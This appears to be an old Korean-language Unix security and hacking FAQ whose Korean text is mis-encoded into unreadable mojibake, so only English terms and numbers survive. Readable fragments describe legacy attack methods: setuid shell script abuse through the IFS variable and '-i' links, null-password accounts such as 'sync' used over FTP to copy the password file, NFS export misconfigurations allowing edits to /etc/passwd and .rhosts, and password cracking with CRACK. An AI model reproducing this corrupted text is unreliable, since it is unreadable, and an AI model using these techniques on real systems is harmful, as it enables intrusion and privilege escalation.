ÃæºÐÈ÷ ¸Å·ÂÀûÀÎ °ÍÀ¸·Î ¹Þ¾Æµé¿©Áö°í ÀÖÀ¸¸ç, Å© ·¡Å·¿¡ Çѹø ¹°µé¸é Á»Ã³·³ ºüÁ®³ª¿À±â Èûµé°Ô µÇ´Â °ÍÀÌ´Ù. '¾î¶»°Ô'¿¡ °üÇÑ ´ë´äÀº ÇÇ»óÀûÀÎ ¿µ¿ªÀÌ´Ù. ´ëÇп¡¼­´Â ´ëÇпø»ýµé »çÀÌ¿¡ ÀÚ±â ID¸¦ ºô·ÁÁÖ´Â °ÍÀÌ ±²ÀåÈ÷ º¸ÆíÀûÀÌ´Ù. °¡·É ´ÙÀ½ÀÇ ¿¹¸¦ º¸ÀÚ. 'A°¡ ´Ù¸¥ site¿¡ ÀÖ´Â ³²ÀÚÄ£±¸ B¿¡°Ô ÀÚ½ÅÀÇ ID¸¦ ºô·ÁÁÖ¾ú´Âµ¥,B¿¡°Ô´Â ³×Æ® ¿öÅ©¸¦ À̸®Àú¸® ±â¿ô°Å¸®±â¸¦ ÁÁ¾ÆÇÏ´Â C¶ó´Â Ä£±¸°¡ ÀÖ¾ú´Ù. C´Â AÀÇ site¿¡ ¼­ Å©·¡Å·ÀÌ °¡´ÉÇÑ ¿©·¯ ID¸¦ ã¾Æ³»°í,±×°ÍµéÀ» ÁÖÀ§ÀÇ Ä£±¸µé¿¡°Ô ¾Ë·Á ÁÖ¾ú ´Ù. ¾ó¸¶ Áö³ªÁö ¾Ê¾Æ, A°¡ »ç¿ëÇÏ´Â ½Ã½ºÅÛ¿¡´Â C¸¦ ºñ·ÔÇÑ ¼ö¸¹Àº ÇØÄ¿µéÀÌ ¼ú¸¶½Ã¸ç ³ë·¡Çϸ鼭 ³î°í ÀÖ¾ú´Ù.' ÀÌ·± Á¾·ùÀÇ ÀÏÀº ´ëÇÐ»Ó ¾Æ´Ï¶ó ¾îµð¼­³ª ½±°Ô ¹ú¾îÁö´Â ÀÏÀÌ´Ù. ÀÌ°ÍÀ» ÇØ°áÇÏ´Â ¹æ¹ýÀº ±³À°À» ÇÏ´Â °ÍÀÌ´Ù. »ç¿ëÀÚµéÀÌ ´ÙÀ½°ú °°Àº ŵµ¸¦ °¡ÁöÁö ¸øÇϵµ·Ï ÇØ¾ß ÇÑ´Ù. '³ª´Â ³»°¡ »ç¿ëÇÏ´Â °èÁ¤¿¡¼­ ¾î¶² Æнº¿öµå¸¦ »ç¿ëÇϵçÁö ½Å°æ¾²Áö ¾Ê´Â´Ù. °á±¹ ³ª´Â ·¹ÀÌÀú¸¦ ÀÌ¿ëÇÏ¿© ÇÁ¸°Æ®¸¦ Çϱâ À§ÇØ ³×Æ®¿öÅ©¸¦ ÀÌ¿ëÇÒ »ÓÀÌ´Ù' ÄÄÇ»ÅÍÀÇ »ç¿ëÀÌ ÀÚ½ÅÀÌ ¼ÓÇÑ ±×·ì¿¡°Ô ¾ó¸¶³ª Áß¿äÇÑ Ã¥ÀÓÀÌ Àִ°¡¸¦ °¡¸£ÃÄ ¾ß ÇÑ´Ù. 9.ħÅõ¸¦ ´çÇÏ¸é ¾î¶»°Ô ÇØ¾ß Çϴ°¡? ÀÎÅͳݿ¡ ¹°·ÁÀÖ´Ù¸é, CERT¿¡ ¿¬¶ôÇ϶ó. CERT´Â 1988³â¿¡ defense advanced research projects agency(DARPA)¿¡ ÀÇÇØ ±¸¼ºµÇ¾úÀ¸¸ç, ÀÎÅÍ³Ý »ç¿ëÀÚµéÀÌ °Þ´Â º¸¾È ¹®Á¦¿¡ °üÇØ µ½´Â°ÍÀ» ¸ñÀûÀ¸·Î ÇÑ ´Ù. CERTÀÇ º»ºÎ´Â software engineering,carnegie mellon univ.,pittsburgh,PA¿¡ À§ Ä¡ÇØ ÀÖ´Ù. 10.'firewall'(¹æÈ­º®)ÀÌ ¹«¾ùÀΰ¡? ÀÎÅÍ³Ý firewallÀº ´ç½ÅÀÇ »çÀÌÆ®¿Í ÀÎÅÍ³Ý Áß°£¿¡ ÀÖ´Â machineÀ¸·Î,³×Æ®¿öÅ©ÀÇ ¼ÒÅë»óȲÀ» Á¶ÀýÇϸç ÀÎÅÍ³Ý port¿¡ ´ëÇÑ Á¢¼ÓÀ» Á¦ÇÑÇÑ´Ù. ºñ½ÁÇÑ ½Ã½ºÅÛÀÌ ´Ù ¸¥ ³×Æ®¿öÅ© ŸÀÔ¿¡µµ °¡´ÉÇÏ´Ù. 11.¿Ö setuid shell scripts¸¦ »ç¿ëÇÒ ¼ö ¾ø´Â°¡? ¿©·¯±âÁö ÀÌÀ¯·Î »ç¿ëÇؼ­´Â ¾ÈµÇ´Âµ¥, ´ë°³´Â À¯´Ð½º Ä¿³Î¿¡ ÀÖ´Â ¹ö±×¿Í °ü·Ã µÇ¾î ÀÖ´Ù. ¿©±â¿¡ ¸î°¡Áö Àß ¾Ë·ÁÁø ¹®Á¦°¡ ³ª¿À´Âµ¥, À̵éÀº ÃÖ±Ù¿¡ ¿Í¼­¾ß ¼ö Á¤µÇ¾ú´Ù. (1)script°¡ "#!/bin/sh"·Î ½ÃÀÛÇÏ°í, link(symbolicÀÌµç ´Ù¸¥°ÍÀ̵ç)rk "-i"¿Í ÇÔ°Ô ¸¸µé¾îÁú ¼ö ÀÖ´Ù¸é,script¸¦ ½ÇÇàÇÒ ¼ö ÀÖÀ¸¹Ç·Î setuid shell·Î ¹Ù·Î µé¾î°¥ ¼ö ÀÖ´Ù. "#!/bin/sh -i",Áï interactive shellÀÌ´Ù. (2)¸í·É¾î 󸮰¡ ½ÃÀ۵Ǵ ½ÃÁ¡°ú ±×¸®°í »õ·Ó°Ô setuid¸¦ ¼³Á¤ÇÏ´Â exec()ed°¡ ÁøÇàµÇ´Â ½ÃÁ¡ »çÀÌ¿¡¼­ ¾î´À ¼¿½ºÅ©¸³Æ®¸¦ ´ç½ÅÀÌ ¼±ÅÃ,½ÇÇà°¡´ÉÇÑ °ÍÀ¸·Î ¹Ù ²Ù¾îÁִ°¡ ÇÏ´Â »óȲÀÌ ¸¹Àº Ä¿³Îµé¿¡°Ô ÇÇÇظ¦ ÀÔÈù´Ù. °è¼ÓÇؼ­ ÁýÁßÀûÀ¸·Î ÆÄ°íµç´Ù¸é À̷лóÀ¸·Î´Â,´©±¸µçÁö ½ÇÇà½ÃÅ°±â¸¦ ¿øÇÏ´Â ÇÁ·Î±×·¥ÀÇ Ä¿³ÎÀ» ¾ò À» ¼ö ÀÖ´Ù (3)IFSÀÇ ¹ö±× : IFSº¯¼ö´Â ¸í·É¾îµéÀ» ó¸®ÇÒ ¶§ ¼¿¿¡ ÀÇÇؼ­ °ø¹éÀ¸·Î ó¸®µÇ ´Â ¹®ÀÚµéÀÇ Ç¥¸¦ °¡Áö°íÀÖ´Ù. '/'¹®ÀÚ¸¦ °¡Áö´Â IFSº¯¼ö¸¦ ¹Ù²Ù¾î 'bin/true'¸¦ 'bin true'·Î ¹Ù²Ü ¼ö ÀÖ´Ù. ¸¸ÀÏ ¿øÇÏ´Â °ÍÀÌ º¯°æµÈ IFSº¯¼ö¸¦ »©³»´Â °ÍÀ̶ó¸é 'bin'¸í·ÉÀ» ´ç½ÅÀÇ °æ·Î¿¡ ¼³Ä¡ÇÏ°í 'bin/true'¶ó´Â setuid ½ºÅ©¸³Æ®¸¦ ½ÇÇàÇÏ¸é µÈ´Ù. Á¤¸»·Î ½ºÅ©¸³Æ®¸¦ ÀÌ¿ëÇÏ¿© setuid¸¦ ¼³Á¤ÇÏ·Á¸é ´ÙÀ½ÀÇ µÎ°¡Áö ¹æ¹ýÀÌ ÀÖ´Ù. a)½ºÅ©¸³Æ®°¡ ½ÇÇàµÇ±â Àü¿¡ IFS¿Í PATH¸¦ ¸®¼Â½ÃÅ°Áö ¾Êµµ·Ï ÁÖÀÇÇÏ¸ç ½ºÅ© ¸³Æ® ÁÖº¯ÀÇ 'C'¿¡ setuid¸¦ Áý¾î³Ö´Â´Ù. ¸¸ÀÏ ½Ã½ºÅÛÀÌ ¶óÀ̺귯¸®¿Í ¸µÅ©½ÃÅ° ±â ½ÃÀÛÇÑ´Ù¸é LD_LIBRARY_PATHÀÇ ¼³Á¤°ªÀ» »ý°¢ÇØ º¸´Â°ÍÀÌ ÁÁ´Ù. b)¾ÈÀüÇÑ setuidÀÇ ¼³Á¤ÀÇ ¿ëÀ̼ºÀ» °¡Áö°í ÀÖÀ¸¸ç º¸¾È¿¡ ¸Å¿ì °­ÇÑ perl°°Àº ½ºÅ©¸³Æ® ¾ð¾î¸¦ »ç¿ëÇ϶ó. ±×·¯³ª ÁøÂ¥·Î ¾ÈÀüÇÑ °ÍÀº ¾Æ¿¹ setuid ½ºÅ©¸³Æ®¸¦ »ç¿ëÇÏÁö ¾Ê´Â°ÍÀÌ´Ù. 12.console·Î Á¢¼ÓÇÑ 'root'¸¦ ¿µ¿øÈ÷ ºüÁ®³ª¿Ã¼ö ¾ø´Â°¡? console·Î 'smart' Å͹̳¯À» »ç¿ëÇÏ°í,'root'·Î Á¢¼ÓÇÑ »óÅ¿¡¼­ '/dev/console'À» ¾²±â °¡´ÉÇÏ°Ô ¸¸µå´Â °ÍÀº ÀáÀçÀûÀÎ °áÁ¡À» °¡Áö°íÀÖ´Ù. Å͹̳ÎÀº escape sequence¸¦ ÅëÇؼ­ ¿ø°ÝÁ¦¾îÇÏ´Â °Í¿¡ ´Ù¼Ò Ãë¾àÁ¡À» °¡Áö°í ÀÖ°í,root shell·Î ¹«¾ùÀΰ¡¸¦ ÀÔ·ÂÇÏ´Â °ÍÀÌ °¡´ÉÇÏ´Ù. Å͹̳ΠÀ¯ÇüÀº 'ps'¸í·ÉÀ» ÀÌ¿ëÇÏ¸é ¾Ë ¼ö ÀÖ´Ù. ÀÌ°Í¿¡ ´ëÇÑ ´Ù¾çÇÑ ÇØ°áÃ¥À» ¸ð»öÇØ º¼ ¼ö Àִµ¥,ÀϹÝÀûÀ¸·Î´Â console ¼ÒÀ¯ÀÚ ¿Í group-write¿¡°Ô¸¸ ¿¢¼¼½º ±ÇÇÑÀ» ÁÖ°í,±×·± ´ÙÀ½ console¿¡ Ãâ·ÂÀ» º¸³¾ ÇÊ ¿ä°¡ ÀÖ´Â ÇÁ·Î±×·¥¿¡¼­ setgid ¸ÞÄ«´ÏÁòÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù. 13.null password¸¦ °¡Áö´Â unix °èÁ¤À» ¸¸µé¼ö ¾ø´Â°¡? ÀÓÀÇ·Î »ç¿ëÇϱâ À§ÇÏ¿© Æнº¿öµå°¡ ¾ø´Â °èÁ¤À» ¸¸µå´Â°ÍÀº »ó´çÈ÷ À§ÇèÇÏ´Ù. Ưº°ÇÑ ÀÌÀ¯°¡ À־¶ó±âº¸´Ù´Â Å©·¡Ä¿°¡ ÀÌ¿ëÇÒ ¼ö ÀÖ´Â °ÅÁ¡À» Á¦°øÇÒ ¼öÀÖ ±â ¶§¹®ÀÌ´Ù. ¿¹¸¦µé¾î,´©±º°¡°¡ Æнº¿öµå°¡ ¾ø´Â °èÁ¤ÀÎ 'sync'¸¦ ã¾Æ³»°í login °úÁ¤¾øÀÌ µð ½ºÅ©¸¦ »ç¿ëÇÏ°Ô µÇ¾ú´Ù°í °¡Á¤ÇÏÀÚ. ÀÌ°ÍÀº ¾ÈÀüÇÏ°í À§ÇèÇØ º¸ÀÌÁö ¾ÊÀ» ¼öµµ ÀÖ´Ù. ±×·¯³ª ´ç½ÅÀÇ ½Ã½ºÅÛÀÌ FTP¿¡ Á¢¼ÓÇϱâ Àü¿¡ »ç¿ëÀÚ¸¦ °Ë»çÇÏÁö ¾Ê´Â ½Ã½ºÅÛ ÁßÀÇ Çϳª¶ó¸é ¹®Á¦°¡ ¹ß»ýÇÒ ¼ö ÀÖ´Ù. Å©·¡Ä¿´Â ´Ù¾çÇÑ FTP¹æ¹ýÀ» ÀÌ¿ëÇÏ¿© Á¢¼ÓÀ» ÇÏ°í, Æнº¿öµå°¡ ¾ø´Â °èÁ¤ 'sync'¸¦ ÀÌ¿ëÇؼ­, Æнº¿öµå ÆÄÀÏÀ» º¹»çÇØ °¡ ¼ö ÀÖ´Ù. À¯´Ð½ºÀÇ ÃֽŹöÀüÀº ÀÌ·± Á¾·ùÀÇ »ç°ÇÀ» ¹Ì¸® ¹æÁöÇÏ´Â ±â´ÉÀ» °®°í ÀÖÁö¸¸,¿Ï ÀüÇÏ°Ô ¾ÈÀüÇÑ ½Ã½ºÅÛÀ» À§Çؼ­´Â ½Ã½ºÅÛÀÇ ¸ðµç ÇÁ·Î±×·¥°ú »ç¿ëÀÚÈ®Àιý µî¿¡ °üÇؼ­ ±íÀÌ ÀÖ´Â Áö½ÄÀ» °¡Áö°íÀÖ¾î¾ß ÇÑ´Ù. null-password°¡ °®°íÀÖ´Â ¶Ç ´Ù¸¥ ¹®Á¦Á¡Àº,ÀÚ½ÅÀÇ ¶óÀ̺귯¸®¿¡ ÀÖ´Â LD_LIBRARY_PATH º¯¼ö¸¦ ¹Ù²ã¼­ 'login -p'¶Ç´Â 'su'¸¦ ½ÇÇà½ÃÅ´À¸·Î½á ÀڽŠÀÇ ÇÁ·Î±×·¥À» 'sync'°¡ »ç¿ëÇÑ °Íó·³ ½Ã½ºÅÛ ÇÁ·Î±×·¥À» ¼ÓÀÏ °¡´É¼ºÀÌ ÀÖ´Ù ´Â °ÍÀÌ´Ù. 14.x-windows¿Í °ü·ÃµÈ º¸¾È»óÀÇ ÇãÁ¡Àº ¾î¶²°ÍÀÌ Àִ°¡? ÀϺδ X¿¡¸¸, ¾î¶² °ÍµéÀº ½Ã½ºÅÛ ÀüüÀÇ º¸¾È¿¡ ¿µÇâÀ» ¹ÌÄ¡±âµµ ÇÑ´Ù. ¿©±â¼­´Â ÀÚ¼¼È÷ ´Ù·çÁö ¾Ê°ÚÀ¸´Ï ´Ù¸¥ Âü°í¼­ÀûÀ» º¸±â¹Ù¶õ´Ù. ÇÑ°¡Áö ÁöÀûÇÏ°í ½ÍÀº °ÍÀº X´Â 'incompatible usage'º¸¾È¿¡ ¹®Á¦¸¦ °¡Áö°í ÀÖ ´Â ÇÁ·Î±×·¥À̶ó´Â °ÍÀÌ´Ù. ¿¹¸¦µé¾î Å©·¡Ä¿´Â Æнº¿öµå°¡ ¾ø´Â °èÁ¤À» ÀÌ¿ëÇÏ ¿© È£½ºÆ®¿¡ ÀÖ´Â xsessionÀ» ½ÇÇàÇÒ °¡´É¼ºÀÌ ÀÖ´Ù. 15.NFS¿¡´Â ¾î¶² ÇãÁ¡ÀÌ Àִ°¡? NFSÀÇ º¸¾ÈÀº ¼­¹ö°¡ ¸¸µé¾î³»´Â ÆÄÀÏÀ» ¼³Ä¡ÇÏ´Â »ç¶÷¿¡°Ô Å©°Ô ÀÇÁ¸ÇÑ´Ù. È£½ºÆ®°¡ ¸¸µé¾î³½ µð·ºÅ丮¸¦ ¼³Ä¡Çϱâ À§ÇÏ¿© Á¤È®ÇÑ Æ÷¸ËÀ» Á¤ÇÏ´Â °ÍÀº À¯ ´Ð½ºÀÇ Á¾·ù¿¡ µû¶ó ´Ù¾çÇÏÁö¸¸, ÀϹÝÀûÀ¸·Î´Â ±× Á¤º¸´Â È­ÀÏ '/etc/exports'¿¡ ÀúÀåµÈ´Ù. ÀÌ È­ÀÏÀº ¸¹Àº µð·ºÅ丮¸¦ °¡Áö°í ÀÖÀ¸¸ç,°¢°¢Àº NFS°¡ ±× µð·ºÅ丮 ·Î mountÇÒ ¼ö Àִ ƯÁ¤ÇÑ È£½ºÆ® ¶Ç´Â ³Ý±×·ìÀÇ ¸ñ·ÏÀ» °¡Áö°í ÀÖ´Ù. À̸ñ·Ï Àº 'access list'¶ó°í ºÒ¸°´Ù. 'hosts'´Â °³º°ÀûÀÎ ½Ã½ºÅÛÀÌÁö¸¸,'netgroups'´Â '/etc/netgroup'¿¡ ¸í½ÃµÇ¾î ÀÖ´Â hosts ¿Í usernameÀÇ Á¶ÇÕÀÌ´Ù. À̰͵éÀº finetuning accessÀÇ ÇÑ ¹æ¹ýÀ» Á¦°øÇÒ ¸ñÀûÀ¸·Î ¸¸µé¾îÁø °ÍÀÌ´Ù. ÀÌ·¯ÇÑ È­ÀϵéÀº Àбâ Àü¿ë,Àбâ-¾²±â °¡´É,±×¸®°í ½´ÆÛÀ¯Àú°¡ Á¢±ÙÇÒ ¼ö Àִ°¡ ¿¡ ´ëÇÑ Á¤º¸µéÀ» Æ÷ÇÔÇÏ°í ÀÖ´Ù. Áß¿äÇÏ°Ô ±â¾ïÇØ¾ß ÇÒ Á¡Àº /etc/exports¿¡ ÀÖ ´Â ƯÁ¤ÇÑ µð·ºÅ丮¸¦ acess list °¡ Æ÷ÇÔÇÏ°í Àִ°¡¿¡ ´ëÇÑ ¿©ºÎÀÌ´Ù. (1) µð·ºÅ丮´Â ¾îµð¿¡ ÀÖ´Â ´©±¸µçÁö mountÇÒ ¼ö ÀÖ´Ù. (2) µð·ºÅ丮´Â Çã°¡µÈ »ç¶÷¸¸ÀÌ mountÇÒ ¼ö ÀÖ´Ù. ÀÌ°ÍÀº ½Å·ÚÇÒ ¸¸ÇÑ »ç¶÷À» ÀÇ¹Ì ÇÏ´Â °ÍÀº ¾Æ´Ï´Ù. ¿¹¸¦µé¾î NFS°¡ PC¿¡¼­ µ¹¾Æ°¡´Â »óȲÀ̶ó¸é ¾î´À ´©±¸µçÁö mount ÇÒ ¼ö ÀÖ´Ù. (3) netgroupÀÌ, a)ºóÄ­À̶ó¸é ¾îµð¿¡ ÀÖ´Â ´©±¸µçÁö ¸¶¿îÆ®ÇÒ¼ö ÀÖ´Ù. b)'(,,)'À» Æ÷ÇÔÇÏ°í ÀÖ´Ù¸é,¾îµð¿¡ ÀÖ´Â ´©±¸³ª ¸¶¿îÆ®ÇÒ¼ö ÀÖ´Ù. c)ºóÄ­À̰ųª '(,,)'À¸·Î ±â·ÏµÈ netgroupÀ» °¡Áö°í ÀÖ´Ù¸é,¾îµð¿¡ ÀÖ´Â ´©±¸³ª ¸¶¿îÆ® ÇÒ¼öÀÖ´Ù. d)'(hostname,,)'¶ó°í ÀûÇôÀÖÀ¸¸é, ÀÌ È£½ºÆ®ÀÇ »ç¿ëÀÚ¸¸ÀÌ ¸¶¿îÆ®ÇÒ¼öÀÖ´Ù. e)(,username,)'¶ó°í ÀûÇôÀÖÀ¸¸é, ÀÌ »ç¿ëÀÚ´Â ¾îµð¼­µçÁö ¸¶¿îÆ®ÇÒ¼öÀÖ´Ù. (4) ¸¸¾à host nameÀÎ 'athena'¸¦ 'ahtena'·Î À߸ø ÀÔ·ÂÇßÀ» °æ¿ì, ÀÌ°ÍÀº netgroup nameÀ¸·Î ¹Þ¾Æµé¿©Áø´Ù. ÀÌ¿Í °°Àº netgroupÀº Á¸ÀçÇÏÁö ¾ÊÀ¸¹Ç·Î ºóÄ­À¸·Î ÀÎ ½ÄµÈ´Ù. µû¶ó¼­ ¾îµð¿¡ ÀÖ´Â ´©±¸µçÁö ¸¶¿îÆ®ÇÒ¼öÀÖ´Ù. µû¶ó¼­ /etc/exports ¿Í /etc/netgroup ¿¡ Áý¾î³ÖÀ» ³»¿ë¿¡ ´ëÇؼ­ ÃæºÐÈ÷ ÁÖÀǸ¦ ±â¿ïÀÌÁö ¾Ê´Â´Ù¸é,pc¸¦ °¡Áö°íÀÖ´Â »ç¿ëÀÚµéÀº ´ÙÀ½°ú °°Àº ÇൿÀ» ÇÒ ¼ö ÀÖ´Ù. a)serverÀÇ È­ÀϽýºÅÛÀ» ÀÚ½ÅÀÇ µð½ºÅ©¿¡ º¹»çÇÒ ¼ö ÀÖ´Ù. b)/etc/passwd,.rhosts,/etc/hosts.equiv¸¦ ÆíÁýÇÒ ¼ö ÀÖ´Ù. c)¶Ç ´Ù¸¥ »ç¿ëÀÚ,¾Æ¸¶µµ 'root'·Î Á¢¼ÓÇÒ °¡´É¼ºÀÌ ÀÖ´Ù. À§ÀÇ Á¤º¸´Â NFS¿¡ µû¶ó ´Þ¶óÁú ¼ö ÀÖÁö¸¸,º¸Åë NFS¿¡¼­´Â ¸ðµÎ Àû¿ëÀÌ µÇ¾ú ´Ù.'EMPTY' netgroupÀ» ¸¸µå´Â °¡Àå ÁÁÀº ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù. ngname(-,-.,-) ÀÌ°ÍÀº no-one,no-host,no-NIS-domainÀ» ÀǹÌÇÑ´Ù. 16.¾ÈÀüÇÑ Æнº¿öµå¸¦ ¸¸µå´Â ¹æ¹ýÀº ¹«¾ùÀΰ¡? ¹æ¹ýÀº¾ø´Ù. '¸¸µç´Ù'¶ó´Â ¸»ÀÌ Áß¿äÇÑ Àǹ̸¦ °¡Áø´Ù. ÀÏ´Ü Æнº¿öµå¸¦ ¸¸µé¾î³» ´Â ¾Ë°í¸®ÁòÀÌ ½Ã½ºÅÛ¿¡¼­ ±¸¼ºµÇ¸é, ÀÌ Æнº¿öµå¸¦ ¾Ë¾Æ³»±â À§Çؼ­´Â ÀÌ ¾Ë°í ¸®Áò¸¸ ºÐ¼®Çس»¸é µÈ´Ù. ¾Ë°í¸®ÁòÀ» º¹ÀâÇÏ°Ô ¸¸µéÁö ¾Ê´Â´Ù¸é ½±°Ô ºÐ¼®ÀÌ µÉ °ÍÀÌ´Ù. a)Å©·¡Ä¿´Â ¸ðµç »ç¿ëÀÚÀÇ Æнº¿öµå¿¡ ´ëÇØ password generator°¡ ¸¸µé¾î ³¾ ¼ö ÀÖ´Â ¸ðµç °æ¿ì¸¦ ´ëÀÔÇغ»´Ù. b)Æнº¿öµå ¾Ë°í¸®ÁòÀ» ºÐ¼®Çؼ­ ´Ù¸¥ »ç¿ëÀÚÀÇ Æнº¿öµå¿¡ Àû¿ë½ÃÄѺ»´Ù. Æнº¿öµå¸¦ Á¦´ë·Î ¸¸µé·Á¸é ´ÙÀ½°ú °°ÀÌ Çؼ­´Â ¾ÈµÈ´Ù. ÀÚ½ÅÀÇ À̸§À̳ª À̸§+¸Ó¸´±ÛÀÚÀÇ ÀϺθ¸ ¹Ù²Û´Ù,»çÀü¿¡ ÀÖ´Â ´Ü¾î¸¦ »ç¿ëÇÑ´Ù, ¸Ó¸´±ÛÀÚ,»ýÈ°°ú °ü·ÃµÇ¾î ½±°Ô ÃßÃøÀÌ °¡´ÉÇѴܾî...... 17.PASSWORD´Â ±×·¸°Ô Áß¿äÇÑ°¡? ÃÖÀü¼±¿¡¼­ ħÅõ¸¦ ¸·¾Æ³»´Â ¿ªÇÒÀ» ÇϹǷΠ¸Å¿ì Áß¿äÇÏ´Ù. Å©·¡Ä¿°¡ ½Ã½ºÅÛ¿¡ Á¢±ÙÇÒ ¼ö ¾ø´Ù¸é,Æнº¿öµå ÆÄÀÏÀ» ¾²°Å³ª ÀÐÀ» ¼ö ¾øÀ¸¸ç ±× ¿ÜÀÇ ´Ù¸¥ ¹æ¹ýµµ Á¸ÀçÇÒ ¼ö ¾ø´Ù. ±×°¡ ÃÖ¼ÒÇÑ Æнº¿öµå ÆÄÀÏÀ» ÀÐÀ» ¼ö ¾ø´Ù¸é ±× ¾È¿¡ ÀÖ´Â ¾î¶² Æнº¿öµåµµ ¾Ë ¾Æ³¾ ¼ö ¾ø´Ù. ±×·¯³ª ±×°¡ Æнº¿öµå È­ÀÏÀ» ÀÐÀ» ¼ö°¡ ÀÖ´Ù¸é,½Ã½ºÅÛÀÇ ÇãÁ¡À» ÀÌ¿ëÇؼ­ rootÀÇ Æнº¿öµå ¸¶Á® ¾Ë¾Æ³¾ °¡´É¼ºÀÌ ÀÖ´Ù. 18.PASSWORDÀÇ Á¶ÇÕÀÌ °¡´ÉÇÑ °³¼ö´Â ¾ó¸¶³ª µÇ´Â°¡? ´ëºÎºÐÀÇ »ç¶÷µéÀº CRACK°°Àº ÇÁ·Î±×·¥µéÀÌ, Æнº¿öµå¿¡ ¾²ÀδÀ °¡´ÉÇÑ ¸ðµç ¹®ÀÚ¸¦ ÀÌ¿ëÇÏ¿© °Ë»öÀ» ÇÒ ¼ö ÀÖÀ» ¸¸Å­ ¹ßÀüÇÒ °ÍÀ̶ó°í °ÆÁ¤ÇÏ°í ÀÖ´Ù. °£´ÜÇÏ°Ô ´ÙÀ½Ã³·³ °¡Á¤À» Çؼ­ °è»êÀ»Çغ¸ÀÚ (1)62°³ÀÇ ¹®ÀÚ¸¦ ÀÌ¿ëÇؼ­ Æнº¿öµå¸¦ ¸¸µç´Ù.(A-Za-z0-9) (2)5°³ºÎÅÍ 8°³ÀÇ ¹®ÀÚ·Î Æнº¿öµå¸¦ ¸¸µç´Ù. ±×·¸´Ù¸é °¡´ÉÇÑ Æнº¿öµåÀÇ Å©±â´Â ´ÙÀ½°ú °°´Ù(62°³ÀÇ ¹®ÀÚ¸¦ ÀÌ¿ë) 100000 + 1000000 + 10000000 + 100000000 = ------------ 111100000 ÇöÀçÀÇ ±â¼úÀ» ÀÌ¿ëÇϸé À§ÀÇ ¹®ÀÚ¿­À» °Ë»öÇÏ´Â °ÍÀº ±×¸® ¾î·ÆÁö ¾Ê´Ù. ±×·¯³ª Æнº¿öµå¿¡´Â ÀÌ ¿Ü¿¡µµ ´Ù¾çÇÑ ¹®ÀÚµéÀÌ »ç¿ëµÈ´Ù´Â °ÍÀ» ÀØÁö ¸»¾Æ¶ó. ,¸ðµç ±¸µÎÁ¡, ±âÈ£(~<>|\$%^&*). ¸¸¾à 95°³ÀÇ ºñÁ¦¾î ¹®ÀÚ¸¦ Æнº¿öµå ¿¡ »ç¿ëÇÒ ¼ö ÀÖ´Ù¸é, Å©·¡Ä¿°¡ ÀÌ ¸ðµÎ¸¦ °Ë»öÇÏ´Â °ÍÀº ½±Áö¾Ê´Ù. ±×·¯³ª ¾ÆÁ÷µµ Å©·¡Ä¿°¡ ½Ã½ºÅÛ¿¡ ħÅõÇÒ °¡´É¼ºÀº ¿©ÀüÈ÷ Á¸ÀçÇÑ´Ù. ³Ê¹« °ÆÁ¤ÇÒ °ÍÀº ¾ø´Ù. °­·ÂÇÑ Æнº¿öµå È­ÀÏÀ» ¸¸µé¾î¼­ ½Ã½ºÅÛÀ» º¸È£ÇÑ´Ù¸é Å©·¡Ä¿µµ ½±°Ô ħÅõÇÏÁö ¸øÇÒ °ÍÀ̱⠶§¹®ÀÌ´Ù. 19.¾ÆÁ÷µµ ÀÎÅÍ³Ý WORMÀÌ Ä§ÀÔ°¡´ÉÇÑ ½Ã½ºÅÛÀÌ Àִ°¡? ´ëºÎºÐÀÇ °æ¿ì À¯´Ð½º ÇÁ·Î±×·¥ÀÇ ¹ö±×°¡ ¼öÁ¤µÇ¾î Áö±ÝÀº wormÀÌ Ä§ÀÔÇÒ ¼ö ÀÖ´Â ½Ã½ºÅÛÀÌ ¸¹Áö ¾Ê´Ù. ±×·¯³ª ¾ÆÁ÷µµ ºÐ¸íÈ÷ ħÀÔ °¡´ÉÇÑ ½Ã½ºÅÛÀÌ Á¸ÀçÇÑ´Ù. * ÇØÅ·Å×Å©´Ð¿¡ ´ëÇÑ ÁÖ¿ä FAQ ¸ðÀ½ * 1.¾î¶»°Ô À¯´Ð½º Æнº¿öµå È­ÀÏ¿¡ Á¢±ÙÇÒ ¼ö Àִ°¡? Ç¥ÁØ À¯´Ð½º¿¡¼­´Â password file ÀÌ /etc/passwdÀÌ´Ù. NIS/yp ¶Ç´Â password shadowingÀ» ÀÌ¿ëÇÏ´Â À¯´Ð½º ½Ã½ºÅÛ¿¡¼­´Â Æнº¿öµåÈ­ÀÏÀÌ ´Ù¸¦ ¼ö ÀÖ ´Ù. 2.¾î¶»°Ô À¯´Ð½º Æнº¿öµå¸¦ ±ú¶ß¸®³ª? ÀϹÝÀûÀ¸·Î À¯´Ð½º Æнº¿öµå´Â Ư¼öÇÑ ÇÔ¼ö·Î ¾Ïȣȭ°¡µÇ¾î ÀÖ¾î Çص¶ÀÌ »ó´çÈ÷ ¾î·Æ´Ù. login ÇÁ ·Î±×·¥Àº password:¿¡¼­ ÀÔ·ÂÇÑ ¹®ÀÚµéÀ» ¾ÏȣȭÇϸç,ÀÌ·¸°Ô ¾ÏȣȭµÈ ¹®ÀÚ¿­Àº À¯´Ð½º¿¡ ÀúÀåµÇ ¾î ÀÖ´Â ±âÁ¸ÀÇ ¾ÏȣȭµÈ ¹®ÀÚ¿­°ú ºñ±³°¡ µÈ´Ù. ÀÌ·¸°Ô ¾ÏȣȭµÈ ¹®ÀÚ¿­ÀÌ ¹«¾ùÀΰ¡¸¦ ¾Ë¾Æ³»±â À§Çؼ­ ´Ü¾îÇ¥¸¦ ÀÌ¿ëÇÏ´Â ¹æ¹ýÀÌ ÀÖ´Ù. ´Ü¾î Ç¥¿¡ ÀÖ´Â °¢°¢ÀÇ ´Ü¾î´Â ¾ÏȣȭµÇ°í Çؼ®ÇÏ°íÀÚ ÇÏ´Â Æнº¿öµåÀÇ ¾Ïȣȭ ÇüÅÂ¿Í ºñ±³µÈ´Ù. À¯´Ð½º Æнº¿öµå¸¦ ¾Ë¾Æ³»´Â °¡Àå ÁÁÀº ÇÁ·Î±×·¥Àº ÇöÀç alec muffetÀÌ ¸¸µç CRACKÀÌ ¸ç,PC-DOS¿¡¼­´Â ÇöÀç CRACKERJACKÀÌ ¸¹ÀÌ ¾²ÀÌ°íÀÖ´Ù. 3.Æнº¿öµå ½¦µµÀ®(¾ÏÈ£ ¼û±â±â)´Â ¹«¾ùÀΰ¡? Password shadowing Àº º¸¾È ü°è¸¦ ÁöĪÇÏ´Â °ÍÀ¸·Î,Æнº¿öµå ½¦µµÀ®À» ÀÌ¿ëÇϸé, /etc/passwd¿¡ µé¾î 